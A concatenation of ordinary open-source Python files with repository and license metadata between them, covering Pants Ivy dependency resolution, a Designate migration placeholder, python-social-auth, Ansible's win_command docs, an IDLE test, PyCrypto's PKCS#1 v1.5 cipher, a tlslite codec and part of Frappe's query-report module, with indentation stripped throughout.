return TemplateData(org=jar.org, module=jar.module, version=jar.version)
@staticmethod
@contextmanager
def cachepath(path):
if not os.path.exists(path):
yield ()
else:
with safe_open(path, 'r') as cp:
yield (path.strip() for path in cp.read().split(os.pathsep) if path.strip())
@classmethod
def _find_new_symlinks(cls, existing_symlink_path, updated_symlink_path):
"""Find the difference between the existing and updated symlink path.
:param existing_symlink_path: map from path : symlink
:param updated_symlink_path: map from path : symlink after new resolve
:return: the portion of updated_symlink_path that is not found in existing_symlink_path.
"""
diff_map = OrderedDict()
for key, value in updated_symlink_path.iteritems():
if key not in existing_symlink_path:
diff_map[key] = value
return diff_map
@classmethod
def symlink_cachepath(cls, ivy_cache_dir, inpath, symlink_dir, outpath, existing_symlink_map):
"""Symlinks all paths listed in inpath that are under ivy_cache_dir into symlink_dir.
If there is an existing symlink for a file under inpath, it is used rather than creating
a new symlink. Preserves all other paths. Writes the resulting paths to outpath.
Returns a map of path -> symlink to that path.
"""
safe_mkdir(symlink_dir)
# The ivy_cache_dir might itself be a symlink. In this case, ivy may return paths that
# reference the realpath of the .jar file after it is resolved in the cache dir. To handle
# this case, add both the symlink'ed path and the realpath to the jar to the symlink map.
real_ivy_cache_dir = os.path.realpath(ivy_cache_dir)
updated_symlink_map = OrderedDict()
with safe_open(inpath, 'r') as infile:
inpaths = filter(None, infile.read().strip().split(os.pathsep))
paths = OrderedSet([os.path.realpath(path) for path in inpaths])
for path in paths:
if path.startswith(real_ivy_cache_dir):
updated_symlink_map[path] = os.path.join(symlink_dir, os.path.relpath(path, real_ivy_cache_dir))
else:
# This path is outside the cache. We won't symlink it.
updated_symlink_map[path] = path
# Create symlinks for paths in the ivy cache dir that we haven't seen before.
new_symlinks = cls._find_new_symlinks(existing_symlink_map, updated_symlink_map)
for path, symlink in new_symlinks.iteritems():
if path == symlink:
# Skip paths that aren't going to be symlinked.
continue
safe_mkdir(os.path.dirname(symlink))
try:
os.symlink(path, symlink)
except OSError as e:
# We don't delete and recreate the symlink, as this may break concurrently executing code.
if e.errno != errno.EEXIST:
raise
# (re)create the classpath with all of the paths
with safe_open(outpath, 'w') as outfile:
outfile.write(':'.join(OrderedSet(updated_symlink_map.values())))
return dict(updated_symlink_map)
@staticmethod
def identify(targets):
targets = list(targets)
if len(targets) == 1 and targets[0].is_jvm and getattr(targets[0], 'provides', None):
return targets[0].provides.org, targets[0].provides.name
else:
return IvyUtils.INTERNAL_ORG_NAME, Target.maybe_readable_identify(targets)
@classmethod
def xml_report_path(cls, resolve_hash_name, conf):
"""The path to the xml report ivy creates after a retrieve.
:param string resolve_hash_name: Hash from the Cache key from the VersionedTargetSet
used for resolution.
:param string conf: the ivy conf name (e.g. "default")
"""
cachedir = IvySubsystem.global_instance().get_options().cache_dir
return os.path.join(cachedir, '{}-{}-{}.xml'.format(IvyUtils.INTERNAL_ORG_NAME,
resolve_hash_name, conf))
@classmethod
def parse_xml_report(cls, resolve_hash_name, conf):
"""Parse the ivy xml report corresponding to the name passed to ivy.
:param string resolve_hash_name: Hash from the Cache key from the VersionedTargetSet
used for resolution.
:param string conf: the ivy conf name (e.g. "default")
:return: The info in the xml report or None if target is empty.
:rtype: IvyInfo
:raises: IvyResolveReportError if no report exists.
"""
if not resolve_hash_name:
return None
path = cls.xml_report_path(resolve_hash_name, conf)
if not os.path.exists(path):
raise cls.IvyResolveReportError('Missing expected ivy output file {}'.format(path))
return cls._parse_xml_report(path)
@classmethod
def _parse_xml_report(cls, path):
logger.debug("Parsing ivy report {}".format(path))
ret = IvyInfo()
etree = ET.parse(path)
doc = etree.getroot()
for module in doc.findall('dependencies/module'):
org = module.get('organisation')
name = module.get('name')
for revision in module.findall('revision'):
rev = revision.get('name')
callers = []
for caller in revision.findall('caller'):
callers.append(IvyModuleRef(caller.get('organisation'),
caller.get('name'),
caller.get('callerrev')))
for artifact in revision.findall('artifacts/artifact'):
ivy_module_ref = IvyModuleRef(org, name, rev, artifact.get('extra-classifier'))
ret.add_module(IvyModule(ivy_module_ref, artifact.get('location'), callers))
return ret
@classmethod
def _combine_jars(cls, jars):
"""Combine jars with the same org/name/version so they can be represented together in ivy.xml.
If you have multiple instances of a dependency with org/name/version with different
classifiers, they need to be represented with one <dependency> tag and multiple <artifact> tags.
:param jars: list of JarDependency definitions
:return: list of JarDependency definitions. These are cloned from the input jars so we
don't mutate the inputs.
"""
jar_map = OrderedDict()
for jar in jars:
key = (jar.org, jar.name, jar.rev)
if key not in jar_map:
jar_map[key] = deepcopy(jar)
else:
# Add an artifact
existing_jar = jar_map[key]
if not existing_jar.artifacts or not jar.artifacts:
# Add an artifact to represent the main artifact
existing_jar.append_artifact(jar.name,
type_=None,
ext=None,
url=None,
classifier=None)
existing_jar.artifacts += jar.artifacts
return jar_map.values()
@classmethod
def generate_ivy(cls, targets, jars, excludes, ivyxml, confs, resolve_hash_name=None):
if resolve_hash_name:
org = IvyUtils.INTERNAL_ORG_NAME
name = resolve_hash_name
else:
org, name = cls.identify(targets)
# As it turns out force is not transitive - it only works for dependencies pants knows about
# directly (declared in BUILD files - present in generated ivy.xml). The user-level ivy docs
# don't make this clear [1], but the source code docs do (see isForce docs) [2]. I was able to
# edit the generated ivy.xml and use the override feature [3] though and that does work
# transitively as you'd hope.
#
# [1] http://ant.apache.org/ivy/history/2.3.0/settings/conflict-managers.html
# [2] https://svn.apache.org/repos/asf/ant/ivy/core/branches/2.3.0/
# src/java/org/apache/ivy/core/module/descriptor/DependencyDescriptor.java
# [3] http://ant.apache.org/ivy/history/2.3.0/ivyfile/override.html
dependencies = [cls._generate_jar_template(jar, confs) for jar in jars]
overrides = [cls._generate_override_template(dep) for dep in dependencies if dep.force]
excludes = [cls._generate_exclude_template(exclude) for exclude in excludes]
template_data = TemplateData(
org=org,
module=name,
version='latest.integration',
publications=None,
configurations=maybe_list(confs), # Mustache doesn't like sets.
dependencies=dependencies,
excludes=excludes,
overrides=overrides)
safe_mkdir(os.path.dirname(ivyxml))
with open(ivyxml, 'w') as output:
generator = Generator(pkgutil.get_data(__name__, cls.IVY_TEMPLATE_PATH),
root_dir=get_buildroot(),
lib=template_data)
generator.write(output)
@classmethod
def calculate_classpath(cls, targets, gather_excludes=True):
jars = OrderedDict()
global_excludes = set()
provide_excludes = set()
targets_processed = set()
# Support the ivy force concept when we sanely can for internal dep conflicts.
# TODO(John Sirois): Consider supporting / implementing the configured ivy revision picking
# strategy generally.
def add_jar(jar):
coordinate = jar.coordinate_without_rev
existing = jars.get(coordinate)
jars[coordinate] = jar if not existing else (
cls._resolve_conflict(existing=existing, proposed=jar)
)
def collect_jars(target):
if not isinstance(target, JarLibrary):
return
# Combine together requests for jars with different classifiers from the same jar_library
# TODO(Eric Ayers) This is a short-term fix for dealing with the same ivy module that
# wants to download multiple jar files with different classifiers as binary dependencies.
# I am trying to work out a better long-term solution in this design doc:
# https://docs.google.com/document/d/1sEMXUmj7v-YCBZ_wHLpCFjkHOeWjsc1NR1hRIJ9uCZ8
for jar in cls._combine_jars(target.jar_dependencies):
if jar.rev:
add_jar(jar)
def collect_excludes(target):
target_excludes = target.payload.get_field_value('excludes')
if target_excludes:
global_excludes.update(target_excludes)
def collect_provide_excludes(target):
if not target.is_exported:
return
logger.debug('Automatically excluding jar {}.{}, which is provided by {}'.format(
target.provides.org, target.provides.name, target))
provide_excludes.add(Exclude(org=target.provides.org, name=target.provides.name))
def collect_elements(target):
targets_processed.add(target)
collect_jars(target)
if gather_excludes:
collect_excludes(target)
collect_provide_excludes(target)
for target in targets:
target.walk(collect_elements, predicate=lambda target: target not in targets_processed)
# If a source dep is exported (ie, has a provides clause), it should always override
# remote/binary versions of itself, ie "round trip" dependencies.
# TODO: Move back to applying provides excludes as target-level excludes when they are no
# longer global.
if provide_excludes:
additional_excludes = tuple(provide_excludes)
for coordinate, jar in jars.items():
jar.excludes += additional_excludes
return jars.values(), global_excludes
@staticmethod
def _resolve_conflict(existing, proposed):
if proposed == existing:
if proposed.force:
return proposed
return existing
elif existing.force and proposed.force:
raise TaskError('Cannot force {}#{};{} to both rev {} and {}'.format(
proposed.org, proposed.name, proposed.classifier or '', existing.rev, proposed.rev
))
elif existing.force:
logger.debug('Ignoring rev {} for {}#{};{} already forced to {}'.format(
proposed.rev, proposed.org, proposed.name, proposed.classifier or '', existing.rev
))
return existing
elif proposed.force:
logger.debug('Forcing {}#{};{} from {} to {}'.format(
proposed.org, proposed.name, proposed.classifier or '', existing.rev, proposed.rev
))
return proposed
else:
try:
if Revision.lenient(proposed.rev) > Revision.lenient(existing.rev):
logger.debug('Upgrading {}#{};{} from rev {} to {}'.format(
proposed.org, proposed.name, proposed.classifier or '', existing.rev, proposed.rev,
))
return proposed
else:
return existing
except Revision.BadRevision as e:
raise TaskError('Failed to parse jar revision', e)
@staticmethod
def _is_mutable(jar):
if jar.mutable is not None:
return jar.mutable
return False
@classmethod
def _generate_jar_template(cls, jar, confs):
template = TemplateData(
org=jar.org,
module=jar.name,
version=jar.rev,
mutable=cls._is_mutable(jar),
force=jar.force,
excludes=[cls._generate_exclude_template(exclude) for exclude in jar.excludes],
transitive=jar.transitive,
artifacts=jar.artifacts,
configurations=maybe_list(confs))
return template
|
apache-2.0
|
cneill/designate-testing
|
designate/storage/impl_sqlalchemy/migrate_repo/versions/058_placeholder.py
|
140
|
1035
|
# Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Author: Kiall Mac Innes <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# This is a placeholder for Kilo backports.
# Do not use this number for new Liberty work. New Liberty work starts after
# all the placeholders.
#
# See https://blueprints.launchpad.net/nova/+spec/backportable-db-migrations
# http://lists.openstack.org/pipermail/openstack-dev/2013-March/006827.html
def upgrade(migrate_engine):
pass
def downgrade(migration_engine):
pass
|
apache-2.0
|
lawrence34/python-social-auth
|
social/strategies/webpy_strategy.py
|
77
|
1932
|
import web
from social.strategies.base import BaseStrategy, BaseTemplateStrategy
class WebpyTemplateStrategy(BaseTemplateStrategy):
def render_template(self, tpl, context):
return web.template.render(tpl)(**context)
def render_string(self, html, context):
return web.template.Template(html)(**context)
class WebpyStrategy(BaseStrategy):
DEFAULT_TEMPLATE_STRATEGY = WebpyTemplateStrategy
def get_setting(self, name):
return getattr(web.config, name)
def request_data(self, merge=True):
if merge:
data = web.input(_method='both')
elif web.ctx.method == 'POST':
data = web.input(_method='post')
else:
data = web.input(_method='get')
return data
def request_host(self):
return web.ctx.host
def redirect(self, url):
return web.seeother(url)
def html(self, content):
web.header('Content-Type', 'text/html;charset=UTF-8')
return content
def render_html(self, tpl=None, html=None, context=None):
if not tpl and not html:
raise ValueError('Missing template or html parameters')
context = context or {}
if tpl:
tpl = web.template.frender(tpl)
else:
tpl = web.template.Template(html)
return tpl(**context)
def session_get(self, name, default=None):
return web.web_session.get(name, default)
def session_set(self, name, value):
web.web_session[name] = value
def session_pop(self, name):
return web.web_session.pop(name, None)
def session_setdefault(self, name, value):
return web.web_session.setdefault(name, value)
def build_absolute_uri(self, path=None):
path = path or ''
if path.startswith('http://') or path.startswith('https://'):
return path
return web.ctx.protocol + '://' + web.ctx.host + path
|
bsd-3-clause
|
jhawkesworth/ansible
|
lib/ansible/modules/windows/win_command.py
|
40
|
3974
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2016, Ansible, inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: win_command
short_description: Executes a command on a remote Windows node
version_added: 2.2
description:
- The C(win_command) module takes the command name followed by a list of space-delimited arguments.
- The given command will be executed on all selected nodes. It will not be
processed through the shell, so variables like C($env:HOME) and operations
like C("<"), C(">"), C("|"), and C(";") will not work (use the M(win_shell)
module if you need these features).
- For non-Windows targets, use the M(command) module instead.
options:
free_form:
description:
- The C(win_command) module takes a free form command to run.
- There is no parameter actually named 'free form'. See the examples!
type: str
required: yes
creates:
description:
- A path or path filter pattern; when the referenced path exists on the target host, the task will be skipped.
type: path
removes:
description:
- A path or path filter pattern; when the referenced path B(does not) exist on the target host, the task will be skipped.
type: path
chdir:
description:
- Set the specified path as the current working directory before executing a command.
type: path
stdin:
description:
- Set the stdin of the command directly to the specified value.
type: str
version_added: '2.5'
notes:
- If you want to run a command through a shell (say you are using C(<),
C(>), C(|), etc), you actually want the M(win_shell) module instead. The
C(win_command) module is much more secure as it's not affected by the user's
environment.
- C(creates), C(removes), and C(chdir) can be specified after the command. For instance, if you only want to run a command if a certain file does not
exist, use this.
seealso:
- module: command
- module: psexec
- module: raw
- module: win_psexec
- module: win_shell
author:
- Matt Davis (@nitzmahone)
'''
EXAMPLES = r'''
- name: Save the result of 'whoami' in 'whoami_out'
win_command: whoami
register: whoami_out
- name: Run command that only runs if folder exists and runs from a specific folder
win_command: wbadmin -backupTarget:C:\backup\
args:
chdir: C:\somedir\
creates: C:\backup\
- name: Run an executable and send data to the stdin for the executable
win_command: powershell.exe -
args:
stdin: Write-Host test
'''
RETURN = r'''
msg:
description: changed
returned: always
type: bool
sample: true
start:
description: The command execution start time
returned: always
type: str
sample: '2016-02-25 09:18:26.429568'
end:
description: The command execution end time
returned: always
type: str
sample: '2016-02-25 09:18:26.755339'
delta:
description: The command execution delta time
returned: always
type: str
sample: '0:00:00.325771'
stdout:
description: The command standard output
returned: always
type: str
sample: 'Clustering node rabbit@slave1 with rabbit@master ...'
stderr:
description: The command standard error
returned: always
type: str
sample: 'ls: cannot access foo: No such file or directory'
cmd:
description: The command executed by the task
returned: always
type: str
sample: 'rabbitmqctl join_cluster rabbit@master'
rc:
description: The command return code (0 means success)
returned: always
type: int
sample: 0
stdout_lines:
description: The command standard output split in lines
returned: always
type: list
sample: [u'Clustering node rabbit@slave1 with rabbit@master ...']
'''
|
gpl-3.0
|
maohongyuan/kbengine
|
kbe/src/lib/python/Lib/idlelib/idle_test/test_textview.py
|
79
|
2871
|
'''Test the functions and main class method of textView.py.
Since all methods and functions create (or destroy) a TextViewer, which
is a widget containing multiple widgets, all tests must be gui tests.
Using mock Text would not change this. Other mocks are used to retrieve
information about calls.
The coverage is essentially 100%.
'''
from test.support import requires
requires('gui')
import unittest
import os
from tkinter import Tk
from idlelib import textView as tv
from idlelib.idle_test.mock_idle import Func
from idlelib.idle_test.mock_tk import Mbox
def setUpModule():
global root
root = Tk()
def tearDownModule():
global root
root.destroy() # pyflakes falsely sees root as undefined
del root
class TV(tv.TextViewer): # used by TextViewTest
transient = Func()
grab_set = Func()
wait_window = Func()
class TextViewTest(unittest.TestCase):
def setUp(self):
TV.transient.__init__()
TV.grab_set.__init__()
TV.wait_window.__init__()
def test_init_modal(self):
view = TV(root, 'Title', 'test text')
self.assertTrue(TV.transient.called)
self.assertTrue(TV.grab_set.called)
self.assertTrue(TV.wait_window.called)
view.Ok()
def test_init_nonmodal(self):
view = TV(root, 'Title', 'test text', modal=False)
self.assertFalse(TV.transient.called)
self.assertFalse(TV.grab_set.called)
self.assertFalse(TV.wait_window.called)
view.Ok()
def test_ok(self):
view = TV(root, 'Title', 'test text', modal=False)
view.destroy = Func()
view.Ok()
self.assertTrue(view.destroy.called)
del view.destroy # unmask real function
view.destroy
class textviewTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.orig_mbox = tv.tkMessageBox
tv.tkMessageBox = Mbox
@classmethod
def tearDownClass(cls):
tv.tkMessageBox = cls.orig_mbox
del cls.orig_mbox
def test_view_text(self):
# If modal True, tkinter will error with 'can't invoke "event" command'
view = tv.view_text(root, 'Title', 'test text', modal=False)
self.assertIsInstance(view, tv.TextViewer)
def test_view_file(self):
test_dir = os.path.dirname(__file__)
testfile = os.path.join(test_dir, 'test_textview.py')
view = tv.view_file(root, 'Title', testfile, modal=False)
self.assertIsInstance(view, tv.TextViewer)
self.assertIn('Test', view.textView.get('1.0', '1.end'))
view.Ok()
# Mock messagebox will be used and view_file will not return anything
testfile = os.path.join(test_dir, '../notthere.py')
view = tv.view_file(root, 'Title', testfile, modal=False)
self.assertIsNone(view)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
lgpl-3.0
|
ardi69/pyload-0.4.10
|
lib/Python/Lib/Crypto/Cipher/PKCS1_v1_5.py
|
123
|
9103
|
# -*- coding: utf-8 -*-
#
# Cipher/PKCS1-v1_5.py : PKCS#1 v1.5
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""RSA encryption protocol according to PKCS#1 v1.5
See RFC3447__ or the `original RSA Labs specification`__ .
This scheme is more properly called ``RSAES-PKCS1-v1_5``.
**If you are designing a new protocol, consider using the more robust PKCS#1 OAEP.**
As an example, a sender may encrypt a message in this way:
>>> from Crypto.Cipher import PKCS1_v1_5
>>> from Crypto.PublicKey import RSA
>>> from Crypto.Hash import SHA
>>>
>>> message = 'To be encrypted'
>>> h = SHA.new(message)
>>>
>>> key = RSA.importKey(open('pubkey.der').read())
>>> cipher = PKCS1_v1_5.new(key)
>>> ciphertext = cipher.encrypt(message+h.digest())
At the receiver side, decryption can be done using the private part of
the RSA key:
>>> From Crypto.Hash import SHA
>>> from Crypto import Random
>>>
>>> key = RSA.importKey(open('privkey.der').read())
>>>
>>> dsize = SHA.digest_size
>>> sentinel = Random.new().read(15+dsize) # Let's assume that average data length is 15
>>>
>>> cipher = PKCS1_v1_5.new(key)
>>> message = cipher.decrypt(ciphertext, sentinel)
>>>
>>> digest = SHA.new(message[:-dsize]).digest()
>>> if digest==message[-dsize:]: # Note how we DO NOT look for the sentinel
>>> print "Encryption was correct."
>>> else:
>>> print "Encryption was not correct."
:undocumented: __revision__, __package__
.. __: http://www.ietf.org/rfc/rfc3447.txt
.. __: http://www.rsa.com/rsalabs/node.asp?id=2125.
"""
__revision__ = "$Id$"
__all__ = [ 'new', 'PKCS115_Cipher' ]
from Crypto.Util.number import ceil_div
from Crypto.Util.py3compat import *
import Crypto.Util.number
class PKCS115_Cipher:
"""This cipher can perform PKCS#1 v1.5 RSA encryption or decryption."""
def __init__(self, key):
"""Initialize this PKCS#1 v1.5 cipher object.
:Parameters:
key : an RSA key object
If a private half is given, both encryption and decryption are possible.
If a public half is given, only encryption is possible.
"""
self._key = key
def can_encrypt(self):
"""Return True if this cipher object can be used for encryption."""
return self._key.can_encrypt()
def can_decrypt(self):
"""Return True if this cipher object can be used for decryption."""
return self._key.can_decrypt()
def encrypt(self, message):
"""Produce the PKCS#1 v1.5 encryption of a message.
This function is named ``RSAES-PKCS1-V1_5-ENCRYPT``, and is specified in
section 7.2.1 of RFC3447.
For a complete example see `Crypto.Cipher.PKCS1_v1_5`.
:Parameters:
message : byte string
The message to encrypt, also known as plaintext. It can be of
variable length, but not longer than the RSA modulus (in bytes) minus 11.
:Return: A byte string, the ciphertext in which the message is encrypted.
It is as long as the RSA modulus (in bytes).
:Raise ValueError:
If the RSA key length is not sufficiently long to deal with the given
message.
"""
# TODO: Verify the key is RSA
randFunc = self._key._randfunc
# See 7.2.1 in RFC3447
modBits = Crypto.Util.number.size(self._key.n)
k = ceil_div(modBits,8) # Convert from bits to bytes
mLen = len(message)
# Step 1
if mLen > k-11:
raise ValueError("Plaintext is too long.")
# Step 2a
class nonZeroRandByte:
def __init__(self, rf): self.rf=rf
def __call__(self, c):
while bord(c)==0x00: c=self.rf(1)[0]
return c
ps = tobytes(map(nonZeroRandByte(randFunc), randFunc(k-mLen-3)))
# Step 2b
em = b('\x00\x02') + ps + bchr(0x00) + message
# Step 3a (OS2IP), step 3b (RSAEP), part of step 3c (I2OSP)
m = self._key.encrypt(em, 0)[0]
# Complete step 3c (I2OSP)
c = bchr(0x00)*(k-len(m)) + m
return c
def decrypt(self, ct, sentinel):
"""Decrypt a PKCS#1 v1.5 ciphertext.
This function is named ``RSAES-PKCS1-V1_5-DECRYPT``, and is specified in
section 7.2.2 of RFC3447.
For a complete example see `Crypto.Cipher.PKCS1_v1_5`.
:Parameters:
ct : byte string
The ciphertext that contains the message to recover.
sentinel : any type
The object to return to indicate that an error was detected during decryption.
:Return: A byte string. It is either the original message or the ``sentinel`` (in case of an error).
:Raise ValueError:
If the ciphertext length is incorrect
:Raise TypeError:
If the RSA key has no private half.
:attention:
You should **never** let the party who submitted the ciphertext know that
this function returned the ``sentinel`` value.
Armed with such knowledge (for a fair amount of carefully crafted but invalid ciphertexts),
an attacker is able to recontruct the plaintext of any other encryption that were carried out
with the same RSA public key (see `Bleichenbacher's`__ attack).
In general, it should not be possible for the other party to distinguish
whether processing at the server side failed because the value returned
was a ``sentinel`` as opposed to a random, invalid message.
In fact, the second option is not that unlikely: encryption done according to PKCS#1 v1.5
embeds no good integrity check. There is roughly one chance
in 2^16 for a random ciphertext to be returned as a valid message
(although random looking).
It is therefore advisabled to:
1. Select as ``sentinel`` a value that resembles a plausable random, invalid message.
2. Not report back an error as soon as you detect a ``sentinel`` value.
Put differently, you should not explicitly check if the returned value is the ``sentinel`` or not.
3. Cover all possible errors with a single, generic error indicator.
4. Embed into the definition of ``message`` (at the protocol level) a digest (e.g. ``SHA-1``).
It is recommended for it to be the rightmost part ``message``.
5. Where possible, monitor the number of errors due to ciphertexts originating from the same party,
and slow down the rate of the requests from such party (or even blacklist it altogether).
**If you are designing a new protocol, consider using the more robust PKCS#1 OAEP.**
.. __: http://www.bell-labs.com/user/bleichen/papers/pkcs.ps
"""
# TODO: Verify the key is RSA
# See 7.2.1 in RFC3447
modBits = Crypto.Util.number.size(self._key.n)
k = ceil_div(modBits,8) # Convert from bits to bytes
# Step 1
if len(ct) != k:
raise ValueError("Ciphertext with incorrect length.")
# Step 2a (O2SIP), 2b (RSADP), and part of 2c (I2OSP)
m = self._key.decrypt(ct)
# Complete step 2c (I2OSP)
em = bchr(0x00)*(k-len(m)) + m
# Step 3
sep = em.find(bchr(0x00),2)
if not em.startswith(b('\x00\x02')) or sep<10:
return sentinel
# Step 4
return em[sep+1:]
def new(key):
"""Return a cipher object `PKCS115_Cipher` that can be used to perform PKCS#1 v1.5 encryption or decryption.
:Parameters:
key : RSA key object
The key to use to encrypt or decrypt the message. This is a `Crypto.PublicKey.RSA` object.
Decryption is only possible if *key* is a private RSA key.
"""
return PKCS115_Cipher(key)
|
gpl-3.0
|
kemalakyol48/python-for-android
|
python-build/python-libs/gdata/src/gdata/tlslite/utils/codec.py
|
361
|
2771
|
"""Classes for reading/writing binary data (such as TLS records)."""
from compat import *
class Writer:
def __init__(self, length=0):
#If length is zero, then this is just a "trial run" to determine length
self.index = 0
self.bytes = createByteArrayZeros(length)
def add(self, x, length):
if self.bytes:
newIndex = self.index+length-1
while newIndex >= self.index:
self.bytes[newIndex] = x & 0xFF
x >>= 8
newIndex -= 1
self.index += length
def addFixSeq(self, seq, length):
if self.bytes:
for e in seq:
self.add(e, length)
else:
self.index += len(seq)*length
def addVarSeq(self, seq, length, lengthLength):
if self.bytes:
self.add(len(seq)*length, lengthLength)
for e in seq:
self.add(e, length)
else:
self.index += lengthLength + (len(seq)*length)
class Parser:
def __init__(self, bytes):
self.bytes = bytes
self.index = 0
def get(self, length):
if self.index + length > len(self.bytes):
raise SyntaxError()
x = 0
for count in range(length):
x <<= 8
x |= self.bytes[self.index]
self.index += 1
return x
def getFixBytes(self, lengthBytes):
bytes = self.bytes[self.index : self.index+lengthBytes]
self.index += lengthBytes
return bytes
def getVarBytes(self, lengthLength):
lengthBytes = self.get(lengthLength)
return self.getFixBytes(lengthBytes)
def getFixList(self, length, lengthList):
l = [0] * lengthList
for x in range(lengthList):
l[x] = self.get(length)
return l
def getVarList(self, length, lengthLength):
lengthList = self.get(lengthLength)
if lengthList % length != 0:
raise SyntaxError()
lengthList = int(lengthList/length)
l = [0] * lengthList
for x in range(lengthList):
l[x] = self.get(length)
return l
def startLengthCheck(self, lengthLength):
self.lengthCheck = self.get(lengthLength)
self.indexCheck = self.index
def setLengthCheck(self, length):
self.lengthCheck = length
self.indexCheck = self.index
def stopLengthCheck(self):
if (self.index - self.indexCheck) != self.lengthCheck:
raise SyntaxError()
def atLengthCheck(self):
if (self.index - self.indexCheck) < self.lengthCheck:
return False
elif (self.index - self.indexCheck) == self.lengthCheck:
return True
else:
raise SyntaxError()
|
apache-2.0
|
gangadhar-kadam/helpdesk-frappe
|
frappe/desk/query_report.py
|
7
|
8955
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
import os, json
from frappe import _
from frappe.modules import scrub, get_module_path
from frappe.utils import flt, cint, get_html_format
from frappe.translate import send_translations
import frappe.desk.reportview
from frappe.permissions import get_role_permissions
def get_report_doc(report_name):
doc = frappe.get_doc("Report", report_name)
if not doc.has_permission("read"):
frappe.throw(_("You don't have access to Report: {0}").format(report_name), frappe.PermissionError)
if not frappe.has_permission(doc.ref_doctype, "report"):
frappe.throw(_("You don't have permission to get a report on: {0}").format(doc.ref_doctype),
frappe.PermissionError)
if doc.disabled:
frappe.throw(_("Report {0} is disabled").format(report_name))
return doc
@frappe.whitelist()
def get_script(report_name):
report = get_report_doc(report_name)
module = report.module or frappe.db.get_value("DocType", report.ref_doctype, "module")
module_path = get_module_path(module)
report_folder = os.path.join(module_path, "report", scrub(report.name))
script_path = os.path.join(report_folder, scrub(report.name) + ".js")
print_path = os.path.join(report_folder, scrub(report.name) + ".html")
script = None
if os.path.exists(script_path):
with open(script_path, "r") as f:
script = f.read()
html_format = get_html_format(print_path)
if not script and report.javascript:
script = report.javascript
if not script:
script = "frappe.query_reports['%s']={}" % report_name
# load translations
if frappe.lang != "en":
send_translations(frappe.get_lang_dict("report", report_name))
return {
"script": script,
"html_format": html_format
}
@frappe.whitelist()
def run(report_name, filters=()):
report = get_report_doc(report_name)
if filters and isinstance(filters, basestring):
filters = json.loads(filters)
if not frappe.has_permission(report.ref_doctype, "report"):
frappe.msgprint(_("Must have report permission to access this report."),
raise_exception=True)
columns, result = [], []
if report.report_type=="Query Report":
if not report.query:
frappe.msgprint(_("Must specify a Query to run"), raise_exception=True)
if not report.query.lower().startswith("select"):
frappe.msgprint(_("Query must be a SELECT"), raise_exception=True)
result = [list(t) for t in frappe.db.sql(report.query, filters)]
columns = [c[0] for c in frappe.db.get_description()]
else:
module = report.module or frappe.db.get_value("DocType", report.ref_doctype, "module")
if report.is_standard=="Yes":
method_name = get_report_module_dotted_path(module, report.name) + ".execute"
columns, result = frappe.get_attr(method_name)(frappe._dict(filters))
if report.apply_user_permissions and result:
result = get_filtered_data(report.ref_doctype, columns, result)
if cint(report.add_total_row) and result:
result = add_total_row(result, columns)
return {
"result": result,
"columns": columns
}
def get_report_module_dotted_path(module, report_name):
return frappe.local.module_app[scrub(module)] + "." + scrub(module) \
+ ".report." + scrub(report_name) + "." + scrub(report_name)
def add_total_row(result, columns):
total_row = [""]*len(columns)
has_percent = []
for row in result:
for i, col in enumerate(columns):
fieldtype = None
if isinstance(col, basestring):
col = col.split(":")
if len(col) > 1:
fieldtype = col[1]
else:
fieldtype = col.get("fieldtype")
if fieldtype in ["Currency", "Int", "Float", "Percent"] and flt(row[i]):
total_row[i] = flt(total_row[i]) + flt(row[i])
if fieldtype == "Percent" and i not in has_percent:
has_percent.append(i)
for i in has_percent:
total_row[i] = total_row[i] / len(result)
first_col_fieldtype = None
if isinstance(columns[0], basestring):
first_col = columns[0].split(":")
if len(first_col) > 1:
first_col_fieldtype = first_col[1].split("/")[0]
else:
first_col_fieldtype = columns[0].get("fieldtype")
if first_col_fieldtype not in ["Currency", "Int", "Float", "Percent"]:
if first_col_fieldtype == "Link":
total_row[0] = "'" + _("Total") + "'"
else:
total_row[0] = _("Total")
result.append(total_row)
return result
def get_filtered_data(ref_doctype, columns, data):
result = []
linked_doctypes = get_linked_doctypes(columns, data)
match_filters_per_doctype = get_user_match_filters(linked_doctypes, ref_doctype)
shared = frappe.share.get_shared(ref_doctype)
columns_dict = get_columns_dict(columns)
role_permissions = get_role_permissions(frappe.get_meta(ref_doctype))
if_owner = role_permissions.get("if_owner", {}).get("report")
if match_filters_per_doctype:
for row in data:
# Why linked_doctypes.get(ref_doctype)? because if column is empty, linked_doctypes[ref_doctype] is removed
if linked_doctypes.get(ref_doctype) and shared and row[linked_doctypes[ref_doctype]] in shared:
result.append(row)
elif has_match(row, linked_doctypes, match_filters_per_doctype, ref_doctype, if_owner, columns_dict):
result.append(row)
else:
result = list(data)
return result
def has_match(row, linked_doctypes, doctype_match_filters, ref_doctype, if_owner, columns_dict):
